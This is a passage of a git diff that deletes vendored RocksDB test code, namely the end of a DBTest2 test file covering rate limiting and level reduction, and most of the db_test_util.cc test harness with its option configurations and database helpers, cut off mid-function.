-  std::atomic<int> rate_limit_count(0);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GenericRateLimiter::Request:1", [&](void* arg) {
-        rate_limit_count.fetch_add(1);
-        int64_t* rate_bytes_per_sec = static_cast<int64_t*>(arg);
-        ASSERT_EQ(1024 * 1024, *rate_bytes_per_sec);
-      });
-  // Block compaction
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBTest.LowPriWrite:0", "DBImpl::BGWorkCompaction"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  WriteOptions wo;
-  for (int i = 0; i < 6; i++) {
-    wo.low_pri = false;
-    Put("", "", wo);
-    wo.low_pri = true;
-    Put("", "", wo);
-    Flush();
-  }
-  ASSERT_EQ(0, rate_limit_count.load());
-  wo.low_pri = true;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-  wo.low_pri = false;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-
-  TEST_SYNC_POINT("DBTest.LowPriWrite:0");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  dbfull()->TEST_WaitForCompact();
-  wo.low_pri = true;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-  wo.low_pri = false;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest2, RateLimitedCompactionReads) {
-  // compaction input has 512KB data
-  const int kNumKeysPerFile = 128;
-  const int kBytesPerKey = 1024;
-  const int kNumL0Files = 4;
-
-  for (auto use_direct_io : {false, true}) {
-    if (use_direct_io && !IsDirectIOSupported()) {
-      continue;
-    }
-    Options options = CurrentOptions();
-    options.compression = kNoCompression;
-    options.level0_file_num_compaction_trigger = kNumL0Files;
-    options.memtable_factory.reset(new SpecialSkipListFactory(kNumKeysPerFile));
-    options.new_table_reader_for_compaction_inputs = true;
-    // takes roughly one second, split into 100 x 10ms intervals. Each interval
-    // permits 5.12KB, which is smaller than the block size, so this test
-    // exercises the code for chunking reads.
-    options.rate_limiter.reset(NewGenericRateLimiter(
-        static_cast<int64_t>(kNumL0Files * kNumKeysPerFile *
-                             kBytesPerKey) /* rate_bytes_per_sec */,
-        10 * 1000 /* refill_period_us */, 10 /* fairness */,
-        RateLimiter::Mode::kReadsOnly));
-    options.use_direct_io_for_flush_and_compaction = use_direct_io;
-    BlockBasedTableOptions bbto;
-    bbto.block_size = 16384;
-    bbto.no_block_cache = true;
-    options.table_factory.reset(new BlockBasedTableFactory(bbto));
-    DestroyAndReopen(options);
-
-    for (int i = 0; i < kNumL0Files; ++i) {
-      for (int j = 0; j <= kNumKeysPerFile; ++j) {
-        ASSERT_OK(Put(Key(j), DummyString(kBytesPerKey)));
-      }
-      dbfull()->TEST_WaitForFlushMemTable();
-      ASSERT_EQ(i + 1, NumTableFilesAtLevel(0));
-    }
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(0, NumTableFilesAtLevel(0));
-
-    ASSERT_EQ(0, options.rate_limiter->GetTotalBytesThrough(Env::IO_HIGH));
-    // should be slightly above 512KB due to non-data blocks read. Arbitrarily
-    // chose 1MB as the upper bound on the total bytes read.
-    size_t rate_limited_bytes =
-        options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW);
-    // Include the explict prefetch of the footer in direct I/O case.
-    size_t direct_io_extra = use_direct_io ? 512 * 1024 : 0;
-    ASSERT_GE(rate_limited_bytes,
-              static_cast<size_t>(kNumKeysPerFile * kBytesPerKey * kNumL0Files +
-                                  direct_io_extra));
-    ASSERT_LT(
-        rate_limited_bytes,
-        static_cast<size_t>(2 * kNumKeysPerFile * kBytesPerKey * kNumL0Files +
-                            direct_io_extra));
-
-    Iterator* iter = db_->NewIterator(ReadOptions());
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_EQ(iter->value().ToString(), DummyString(kBytesPerKey));
-    }
-    delete iter;
-    // bytes read for user iterator shouldn't count against the rate limit.
-    ASSERT_EQ(rate_limited_bytes,
-              static_cast<size_t>(
-                  options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW)));
-  }
-}
-#endif  // ROCKSDB_LITE
-
-// Make sure DB can be reopen with reduced number of levels, given no file
-// is on levels higher than the new num_levels.
-TEST_F(DBTest2, ReduceLevel) {
-  Options options;
-  options.disable_auto_compactions = true;
-  options.num_levels = 7;
-  Reopen(options);
-  Put("foo", "bar");
-  Flush();
-  MoveFilesToLevel(6);
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("0,0,0,0,0,0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 1;
-  dbfull()->CompactRange(compact_options, nullptr, nullptr);
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-  options.num_levels = 3;
-  Reopen(options);
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_test_util.cc b/thirdparty/rocksdb/db/db_test_util.cc
deleted file mode 100644
index c4d465b..0000000
--- a/thirdparty/rocksdb/db/db_test_util.cc
+++ /dev/null
@@ -1,1395 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "db/forward_iterator.h"
-#include "rocksdb/env_encryption.h"
-
-namespace rocksdb {
-
-// Special Env used to delay background operations
-
-SpecialEnv::SpecialEnv(Env* base)
-    : EnvWrapper(base),
-      rnd_(301),
-      sleep_counter_(this),
-      addon_time_(0),
-      time_elapse_only_sleep_(false),
-      no_slowdown_(false) {
-  delay_sstable_sync_.store(false, std::memory_order_release);
-  drop_writes_.store(false, std::memory_order_release);
-  no_space_.store(false, std::memory_order_release);
-  non_writable_.store(false, std::memory_order_release);
-  count_random_reads_ = false;
-  count_sequential_reads_ = false;
-  manifest_sync_error_.store(false, std::memory_order_release);
-  manifest_write_error_.store(false, std::memory_order_release);
-  log_write_error_.store(false, std::memory_order_release);
-  random_file_open_counter_.store(0, std::memory_order_relaxed);
-  delete_count_.store(0, std::memory_order_relaxed);
-  num_open_wal_file_.store(0);
-  log_write_slowdown_ = 0;
-  bytes_written_ = 0;
-  sync_counter_ = 0;
-  non_writeable_rate_ = 0;
-  new_writable_count_ = 0;
-  non_writable_count_ = 0;
-  table_write_callback_ = nullptr;
-}
-#ifndef ROCKSDB_LITE
-ROT13BlockCipher rot13Cipher_(16);
-#endif  // ROCKSDB_LITE
-
-DBTestBase::DBTestBase(const std::string path)
-    : mem_env_(!getenv("MEM_ENV") ? nullptr : new MockEnv(Env::Default())),
-#ifndef ROCKSDB_LITE
-      encrypted_env_(
-          !getenv("ENCRYPTED_ENV")
-              ? nullptr
-              : NewEncryptedEnv(mem_env_ ? mem_env_ : Env::Default(),
-                                new CTREncryptionProvider(rot13Cipher_))),
-#else
-      encrypted_env_(nullptr),
-#endif  // ROCKSDB_LITE
-      env_(new SpecialEnv(encrypted_env_
-                              ? encrypted_env_
-                              : (mem_env_ ? mem_env_ : Env::Default()))),
-      option_config_(kDefault) {
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  dbname_ = test::TmpDir(env_) + path;
-  alternative_wal_dir_ = dbname_ + "/wal";
-  alternative_db_log_dir_ = dbname_ + "/db_log_dir";
-  auto options = CurrentOptions();
-  options.env = env_;
-  auto delete_options = options;
-  delete_options.wal_dir = alternative_wal_dir_;
-  EXPECT_OK(DestroyDB(dbname_, delete_options));
-  // Destroy it for not alternative WAL dir is used.
-  EXPECT_OK(DestroyDB(dbname_, options));
-  db_ = nullptr;
-  Reopen(options);
-  Random::GetTLSInstance()->Reset(0xdeadbeef);
-}
-
-DBTestBase::~DBTestBase() {
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  Close();
-  Options options;
-  options.db_paths.emplace_back(dbname_, 0);
-  options.db_paths.emplace_back(dbname_ + "_2", 0);
-  options.db_paths.emplace_back(dbname_ + "_3", 0);
-  options.db_paths.emplace_back(dbname_ + "_4", 0);
-  options.env = env_;
-
-  if (getenv("KEEP_DB")) {
-    printf("DB is still at %s\n", dbname_.c_str());
-  } else {
-    EXPECT_OK(DestroyDB(dbname_, options));
-  }
-  delete env_;
-}
-
-bool DBTestBase::ShouldSkipOptions(int option_config, int skip_mask) {
-#ifdef ROCKSDB_LITE
-    // These options are not supported in ROCKSDB_LITE
-  if (option_config == kHashSkipList ||
-      option_config == kPlainTableFirstBytePrefix ||
-      option_config == kPlainTableCappedPrefix ||
-      option_config == kPlainTableCappedPrefixNonMmap ||
-      option_config == kPlainTableAllBytesPrefix ||
-      option_config == kVectorRep || option_config == kHashLinkList ||
-      option_config == kHashCuckoo || option_config == kUniversalCompaction ||
-      option_config == kUniversalCompactionMultiLevel ||
-      option_config == kUniversalSubcompactions ||
-      option_config == kFIFOCompaction ||
-      option_config == kConcurrentSkipList) {
-    return true;
-    }
-#endif
-
-    if ((skip_mask & kSkipUniversalCompaction) &&
-        (option_config == kUniversalCompaction ||
-         option_config == kUniversalCompactionMultiLevel)) {
-      return true;
-    }
-    if ((skip_mask & kSkipMergePut) && option_config == kMergePut) {
-      return true;
-    }
-    if ((skip_mask & kSkipNoSeekToLast) &&
-        (option_config == kHashLinkList || option_config == kHashSkipList)) {
-      return true;
-    }
-    if ((skip_mask & kSkipPlainTable) &&
-        (option_config == kPlainTableAllBytesPrefix ||
-         option_config == kPlainTableFirstBytePrefix ||
-         option_config == kPlainTableCappedPrefix ||
-         option_config == kPlainTableCappedPrefixNonMmap)) {
-      return true;
-    }
-    if ((skip_mask & kSkipHashIndex) &&
-        (option_config == kBlockBasedTableWithPrefixHashIndex ||
-         option_config == kBlockBasedTableWithWholeKeyHashIndex)) {
-      return true;
-    }
-    if ((skip_mask & kSkipHashCuckoo) && (option_config == kHashCuckoo)) {
-      return true;
-    }
-    if ((skip_mask & kSkipFIFOCompaction) && option_config == kFIFOCompaction) {
-      return true;
-    }
-    if ((skip_mask & kSkipMmapReads) && option_config == kWalDirAndMmapReads) {
-      return true;
-    }
-    return false;
-}
-
-// Switch to a fresh database with the next option configuration to
-// test.  Return false if there are no more configurations to test.
-bool DBTestBase::ChangeOptions(int skip_mask) {
-  for (option_config_++; option_config_ < kEnd; option_config_++) {
-    if (ShouldSkipOptions(option_config_, skip_mask)) {
-      continue;
-    }
-    break;
-  }
-
-  if (option_config_ >= kEnd) {
-    Destroy(last_options_);
-    return false;
-  } else {
-    auto options = CurrentOptions();
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    return true;
-  }
-}
-
-// Switch between different compaction styles.
-bool DBTestBase::ChangeCompactOptions() {
-  if (option_config_ == kDefault) {
-    option_config_ = kUniversalCompaction;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kUniversalCompaction) {
-    option_config_ = kUniversalCompactionMultiLevel;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kUniversalCompactionMultiLevel) {
-    option_config_ = kLevelSubcompactions;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    assert(options.max_subcompactions > 1);
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kLevelSubcompactions) {
-    option_config_ = kUniversalSubcompactions;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    assert(options.max_subcompactions > 1);
-    TryReopen(options);
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Switch between different WAL settings
-bool DBTestBase::ChangeWalOptions() {
-  if (option_config_ == kDefault) {
-    option_config_ = kDBLogDir;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    Destroy(options);
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kDBLogDir) {
-    option_config_ = kWalDirAndMmapReads;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    Destroy(options);
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kWalDirAndMmapReads) {
-    option_config_ = kRecycleLogFiles;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    Destroy(options);
-    TryReopen(options);
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Switch between different filter policy
-// Jump from kDefault to kFilter to kFullFilter
-bool DBTestBase::ChangeFilterOptions() {
-  if (option_config_ == kDefault) {
-    option_config_ = kFilter;
-  } else if (option_config_ == kFilter) {
-    option_config_ = kFullFilterWithNewTableReaderForCompactions;
-  } else if (option_config_ == kFullFilterWithNewTableReaderForCompactions) {
-    option_config_ = kPartitionedFilterWithNewTableReaderForCompactions;
-  } else {
-    return false;
-  }
-  Destroy(last_options_);
-
-  auto options = CurrentOptions();
-  options.create_if_missing = true;
-  TryReopen(options);
-  return true;
-}
-
-// Return the current option configuration.
-Options DBTestBase::CurrentOptions(
-    const anon::OptionsOverride& options_override) const {
-  return GetOptions(option_config_, GetDefaultOptions(), options_override);
-}
-
-Options DBTestBase::CurrentOptions(
-    const Options& default_options,
-    const anon::OptionsOverride& options_override) const {
-  return GetOptions(option_config_, default_options, options_override);
-}
-
-Options DBTestBase::GetDefaultOptions() {
-  Options options;
-  options.write_buffer_size = 4090 * 4096;
-  options.target_file_size_base = 2 * 1024 * 1024;
-  options.max_bytes_for_level_base = 10 * 1024 * 1024;
-  options.max_open_files = 5000;
-  options.wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-  options.compaction_pri = CompactionPri::kByCompensatedSize;
-  return options;
-}
-
-Options DBTestBase::GetOptions(
-    int option_config, const Options& default_options,
-    const anon::OptionsOverride& options_override) const {
-  // this redundant copy is to minimize code change w/o having lint error.
-  Options options = default_options;
-  BlockBasedTableOptions table_options;
-  bool set_block_based_table_factory = true;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) &&  \
-  !defined(OS_AIX)
-  rocksdb::SyncPoint::GetInstance()->ClearCallBack(
-      "NewRandomAccessFile:O_DIRECT");
-  rocksdb::SyncPoint::GetInstance()->ClearCallBack(
-      "NewWritableFile:O_DIRECT");
-#endif
-
-  bool can_allow_mmap = IsMemoryMappedAccessSupported();
-  switch (option_config) {
-#ifndef ROCKSDB_LITE
-    case kHashSkipList:
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-      options.allow_concurrent_memtable_write = false;
-      break;
-    case kPlainTableFirstBytePrefix:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      options.allow_mmap_reads = can_allow_mmap;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kPlainTableCappedPrefix:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewCappedPrefixTransform(8));
-      options.allow_mmap_reads = can_allow_mmap;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kPlainTableCappedPrefixNonMmap:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewCappedPrefixTransform(8));
-      options.allow_mmap_reads = false;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kPlainTableAllBytesPrefix:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewNoopTransform());
-      options.allow_mmap_reads = can_allow_mmap;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kVectorRep:
-      options.memtable_factory.reset(new VectorRepFactory(100));
-      options.allow_concurrent_memtable_write = false;
-      break;
-    case kHashLinkList:
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      options.memtable_factory.reset(
-          NewHashLinkListRepFactory(4, 0, 3, true, 4));
-      options.allow_concurrent_memtable_write = false;
-      break;
-    case kHashCuckoo:
-      options.memtable_factory.reset(
-          NewHashCuckooRepFactory(options.write_buffer_size));
-      options.allow_concurrent_memtable_write = false;
-      break;
-#endif  // ROCKSDB_LITE
-    case kMergePut:
-      options.merge_operator = MergeOperators::CreatePutOperator();
-      break;
-    case kFilter:
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-      break;
-    case kFullFilterWithNewTableReaderForCompactions:
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-      options.new_table_reader_for_compaction_inputs = true;
-      options.compaction_readahead_size = 10 * 1024 * 1024;
-      break;
-    case kPartitionedFilterWithNewTableReaderForCompactions:
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-      table_options.partition_filters = true;
-      table_options.index_type =
-          BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-      options.new_table_reader_for_compaction_inputs = true;
-      options.compaction_readahead_size = 10 * 1024 * 1024;
-      break;
-    case kUncompressed:
-      options.compression = kNoCompression;
-      break;
-    case kNumLevel_3:
-      options.num_levels = 3;
-      break;
-    case kDBLogDir:
-      options.db_log_dir = alternative_db_log_dir_;
-      break;
-    case kWalDirAndMmapReads:
-      options.wal_dir = alternative_wal_dir_;
-      // mmap reads should be orthogonal to WalDir setting, so we piggyback to
-      // this option config to test mmap reads as well
-      options.allow_mmap_reads = can_allow_mmap;
-      break;
-    case kManifestFileSize:
-      options.max_manifest_file_size = 50;  // 50 bytes
-      break;
-    case kPerfOptions:
-      options.soft_rate_limit = 2.0;
-      options.delayed_write_rate = 8 * 1024 * 1024;
-      options.report_bg_io_stats = true;
-      // TODO(3.13) -- test more options
-      break;
-    case kUniversalCompaction:
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 1;
-      break;
-    case kUniversalCompactionMultiLevel:
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 8;
-      break;
-    case kCompressedBlockCache:
-      options.allow_mmap_writes = can_allow_mmap;
-      table_options.block_cache_compressed = NewLRUCache(8 * 1024 * 1024);
-      break;
-    case kInfiniteMaxOpenFiles:
-      options.max_open_files = -1;
-      break;
-    case kxxHashChecksum: {
-      table_options.checksum = kxxHash;
-      break;
-    }
-    case kFIFOCompaction: {
-      options.compaction_style = kCompactionStyleFIFO;
-      break;
-    }
-    case kBlockBasedTableWithPrefixHashIndex: {
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      break;
-    }
-    case kBlockBasedTableWithWholeKeyHashIndex: {
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      options.prefix_extractor.reset(NewNoopTransform());
-      break;
-    }
-    case kBlockBasedTableWithPartitionedIndex: {
-      table_options.index_type = BlockBasedTableOptions::kTwoLevelIndexSearch;
-      options.prefix_extractor.reset(NewNoopTransform());
-      break;
-    }
-    case kBlockBasedTableWithIndexRestartInterval: {
-      table_options.index_block_restart_interval = 8;
-      break;
-    }
-    case kOptimizeFiltersForHits: {
-      options.optimize_filters_for_hits = true;
-      set_block_based_table_factory = true;
-      break;
-    }
-    case kRowCache: {
-      options.row_cache = NewLRUCache(1024 * 1024);
-      break;
-    }
-    case kRecycleLogFiles: {
-      options.recycle_log_file_num = 2;
-      break;
-    }
-    case kLevelSubcompactions: {
-      options.max_subcompactions = 4;
-      break;
-    }
-    case kUniversalSubcompactions: {
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 8;
-      options.max_subcompactions = 4;
-      break;
-    }
-    case kConcurrentSkipList: {
-      options.allow_concurrent_memtable_write = true;
-      options.enable_write_thread_adaptive_yield = true;
-      break;
-    }
-    case kDirectIO: {
-      options.use_direct_reads = true;
-      options.use_direct_io_for_flush_and_compaction = true;
-      options.compaction_readahead_size = 2 * 1024 * 1024;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \
-    !defined(OS_AIX)
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "NewWritableFile:O_DIRECT", [&](void* arg) {
-            int* val = static_cast<int*>(arg);
-            *val &= ~O_DIRECT;
-          });
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "NewRandomAccessFile:O_DIRECT", [&](void* arg) {
-            int* val = static_cast<int*>(arg);
-            *val &= ~O_DIRECT;
-          });
-      rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-#endif
-      break;
-    }
-    case kPipelinedWrite: {
-      options.enable_pipelined_write = true;
-      break;
-    }
-    case kConcurrentWALWrites: {
-      // This options optimize 2PC commit path
-      options.concurrent_prepare = true;
-      options.manual_wal_flush = true;
-      break;
-    }
-
-    default:
-      break;
-  }
-
-  if (options_override.filter_policy) {
-    table_options.filter_policy = options_override.filter_policy;
-    table_options.partition_filters = options_override.partition_filters;
-    table_options.metadata_block_size = options_override.metadata_block_size;
-  }
-  if (set_block_based_table_factory) {
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-  options.env = env_;
-  options.create_if_missing = true;
-  options.fail_if_options_file_error = true;
-  return options;
-}
-
-void DBTestBase::CreateColumnFamilies(const std::vector<std::string>& cfs,
-                                      const Options& options) {
-  ColumnFamilyOptions cf_opts(options);
-  size_t cfi = handles_.size();
-  handles_.resize(cfi + cfs.size());
-  for (auto cf : cfs) {
-    ASSERT_OK(db_->CreateColumnFamily(cf_opts, cf, &handles_[cfi++]));
-  }
-}
-
-void DBTestBase::CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                                       const Options& options) {
-  CreateColumnFamilies(cfs, options);
-  std::vector<std::string> cfs_plus_default = cfs;
-  cfs_plus_default.insert(cfs_plus_default.begin(), kDefaultColumnFamilyName);
-  ReopenWithColumnFamilies(cfs_plus_default, options);
-}
-
-void DBTestBase::ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                          const std::vector<Options>& options) {
-  ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-}
-
-void DBTestBase::ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                          const Options& options) {
-  ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-}
-
-Status DBTestBase::TryReopenWithColumnFamilies(
-    const std::vector<std::string>& cfs, const std::vector<Options>& options) {
-  Close();
-  EXPECT_EQ(cfs.size(), options.size());
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (size_t i = 0; i < cfs.size(); ++i) {
-    column_families.push_back(ColumnFamilyDescriptor(cfs[i], options[i]));
-  }
-  DBOptions db_opts = DBOptions(options[0]);
-  return DB::Open(db_opts, dbname_, column_families, &handles_, &db_);
-}
-
-Status DBTestBase::TryReopenWithColumnFamilies(
-    const std::vector<std::string>& cfs, const Options& options) {
-  Close();
-  std::vector<Options> v_opts(cfs.size(), options);
-  return TryReopenWithColumnFamilies(cfs, v_opts);
-}
-
-void DBTestBase::Reopen(const Options& options) {
-  ASSERT_OK(TryReopen(options));
-}
-
-void DBTestBase::Close() {
-  for (auto h : handles_) {
-    db_->DestroyColumnFamilyHandle(h);
-  }
-  handles_.clear();
-  delete db_;
-  db_ = nullptr;
-}
-
-void DBTestBase::DestroyAndReopen(const Options& options) {
-  // Destroy using last options
-  Destroy(last_options_);
-  ASSERT_OK(TryReopen(options));
-}
-
-void DBTestBase::Destroy(const Options& options) {
-  Close();
-  ASSERT_OK(DestroyDB(dbname_, options));
-}
-
-Status DBTestBase::ReadOnlyReopen(const Options& options) {
-  return DB::OpenForReadOnly(options, dbname_, &db_);
-}
-
-Status DBTestBase::TryReopen(const Options& options) {
-  Close();
-  last_options_.table_factory.reset();
-  // Note: operator= is an unsafe approach here since it destructs shared_ptr in
-  // the same order of their creation, in contrast to destructors which
-  // destructs them in the opposite order of creation. One particular problme is
-  // that the cache destructor might invoke callback functions that use Option
-  // members such as statistics. To work around this problem, we manually call
-  // destructor of table_facotry which eventually clears the block cache.
-  last_options_ = options;
-  return DB::Open(options, dbname_, &db_);
-}
-
-bool DBTestBase::IsDirectIOSupported() {
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  env_options.use_direct_writes = true;
-  std::string tmp = TempFileName(dbname_, 999);
-  Status s;
-  {
-    unique_ptr<WritableFile> file;
-    s = env_->NewWritableFile(tmp, &file, env_options);
-  }
-  if (s.ok()) {
-    s = env_->DeleteFile(tmp);
-  }
-  return s.ok();
-}
-
-bool DBTestBase::IsMemoryMappedAccessSupported() const {
-  return (!encrypted_env_);
-}
-
-Status DBTestBase::Flush(int cf) {
-  if (cf == 0) {
-    return db_->Flush(FlushOptions());
-  } else {
-    return db_->Flush(FlushOptions(), handles_[cf]);
-  }
-}
-
-Status DBTestBase::Put(const Slice& k, const Slice& v, WriteOptions wo) {
-  if (kMergePut == option_config_) {
-    return db_->Merge(wo, k, v);
-  } else {
-    return db_->Put(wo, k, v);
-  }
-}
-
-Status DBTestBase::Put(int cf, const Slice& k, const Slice& v,
-                       WriteOptions wo) {
-  if (kMergePut == option_config_) {
-    return db_->Merge(wo, handles_[cf], k, v);
-  } else {
-    return db_->Put(wo, handles_[cf], k, v);
-  }
-}
-
-Status DBTestBase::Merge(const Slice& k, const Slice& v, WriteOptions wo) {
-  return db_->Merge(wo, k, v);
-}
-
-Status DBTestBase::Merge(int cf, const Slice& k, const Slice& v,
-                         WriteOptions wo) {
-  return db_->Merge(wo, handles_[cf], k, v);
-}
-
-Status DBTestBase::Delete(const std::string& k) {
-  return db_->Delete(WriteOptions(), k);
-}
-
-Status DBTestBase::Delete(int cf, const std::string& k) {
-  return db_->Delete(WriteOptions(), handles_[cf], k);
-}
-
-Status DBTestBase::SingleDelete(const std::string& k) {
-  return db_->SingleDelete(WriteOptions(), k);
-}
-
-Status DBTestBase::SingleDelete(int cf, const std::string& k) {
-  return db_->SingleDelete(WriteOptions(), handles_[cf], k);
-}
-
-std::string DBTestBase::Get(const std::string& k, const Snapshot* snapshot) {
-  ReadOptions options;
-  options.verify_checksums = true;
-  options.snapshot = snapshot;
-  std::string result;
-  Status s = db_->Get(options, k, &result);
-  if (s.IsNotFound()) {
-    result = "NOT_FOUND";
-  } else if (!s.ok()) {
-    result = s.ToString();
-  }
-  return result;
-}
-
-std::string DBTestBase::Get(int cf, const std::string& k,
-                            const Snapshot* snapshot) {
-  ReadOptions options;
-  options.verify_checksums = true;
-  options.snapshot = snapshot;
-  std::string result;
-  Status s = db_->Get(options, handles_[cf], k, &result);
-  if (s.IsNotFound()) {
-    result = "NOT_FOUND";
-  } else if (!s.ok()) {
-    result = s.ToString();
-  }
-  return result;
-}
-
-Status DBTestBase::Get(const std::string& k, PinnableSlice* v) {
-  ReadOptions options;
-  options.verify_checksums = true;
-  Status s = dbfull()->Get(options, dbfull()->DefaultColumnFamily(), k, v);
-  return s;
-}
-
-uint64_t DBTestBase::GetNumSnapshots() {
-  uint64_t int_num;
-  EXPECT_TRUE(dbfull()->GetIntProperty("rocksdb.num-snapshots", &int_num));
-  return int_num;
-}
-
-uint64_t DBTestBase::GetTimeOldestSnapshots() {
-  uint64_t int_num;
-  EXPECT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.oldest-snapshot-time", &int_num));
-  return int_num;
-}
-
-// Return a string that contains all key,value pairs in order,
-// formatted like "(k1->v1)(k2->v2)".
-std::string DBTestBase::Contents(int cf) {
-  std::vector<std::string> forward;
-  std::string result;
-  Iterator* iter = (cf == 0) ? db_->NewIterator(ReadOptions())
-                             : db_->NewIterator(ReadOptions(), handles_[cf]);
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string s = IterStatus(iter);
-    result.push_back('(');
-    result.append(s);
-    result.push_back(')');
-    forward.push_back(s);
-  }
-
-  // Check reverse iteration results are the reverse of forward results
-  unsigned int matched = 0;
-  for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-    EXPECT_LT(matched, forward.size());
-    EXPECT_EQ(IterStatus(iter), forward[forward.size() - matched - 1]);
-    matched++;
-  }
-  EXPECT_EQ(matched, forward.size());
-
-  delete iter;
-  return result;
-}
-
-std::string DBTestBase::AllEntriesFor(const Slice& user_key, int cf) {
-  Arena arena;
-  auto options = CurrentOptions();
-  InternalKeyComparator icmp(options.comparator);
-  RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-  ScopedArenaIterator iter;
-  if (cf == 0) {
-    iter.set(dbfull()->NewInternalIterator(&arena, &range_del_agg));
-  } else {
-    iter.set(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[cf]));
-  }
-  InternalKey target(user_key, kMaxSequenceNumber, kTypeValue);
-  iter->Seek(target.Encode());
-  std::string result;
-  if (!iter->status().ok()) {
-    result = iter->status().ToString();
-  } else {
-    result = "[ ";
-    bool first = true;
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      if (!ParseInternalKey(iter->key(), &ikey)) {
-        result += "CORRUPTED";
